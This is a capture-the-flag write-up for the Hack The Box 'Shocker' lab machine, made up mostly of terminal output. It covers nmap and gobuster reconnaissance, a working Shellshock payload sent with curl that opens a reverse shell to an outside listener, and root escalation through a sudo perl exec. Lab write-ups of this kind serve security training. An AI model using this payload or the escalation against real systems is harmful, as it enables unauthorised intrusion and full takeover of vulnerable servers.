Write-Up: HTB Shocker

kali@kali:~/development/Mercon$ ./mercon.py -t shocker -i 10.10.10.56 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-06 12:04 EST
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds

[+] Gobuster Running
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/11/06 12:04:43 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/11/06 12:07:30 Finished
===============================================================
kali@kali:~/htb/shocker$ gobuster dir -x txt,php,html -u 10.10.10.56 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2020/11/06 12:25:21 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/11/06 12:26:13 Finished
===============================================================
kali@kali:~/htb/shocker$ gobuster dir -x txt,py,pl,sh,php -u 10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: py,pl,sh,php,txt
[+] Timeout: 10s
===============================================================
2020/11/06 12:34:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.pl (Status: 403)
/.hta.sh (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.pl (Status: 403)
/.htaccess.sh (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.pl (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/11/06 12:35:18 Finished
===============================================================
kali@kali:~/htb/shocker$ cat user.sh 
Content-Type: text/plain

Just an uptime test script

12:37:17 up 37 min, 0 users, load average: 0.03, 0.16, 0.17

Google cgi script exploits and find Shellshock and create curl request
() { :;};
kali@kali:~/htb/shocker$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.23/4444 0>&1' http://10.10.10.56/cgi-bin/user.sh
kali@kali:~/htb/shocker$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.56 54592
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store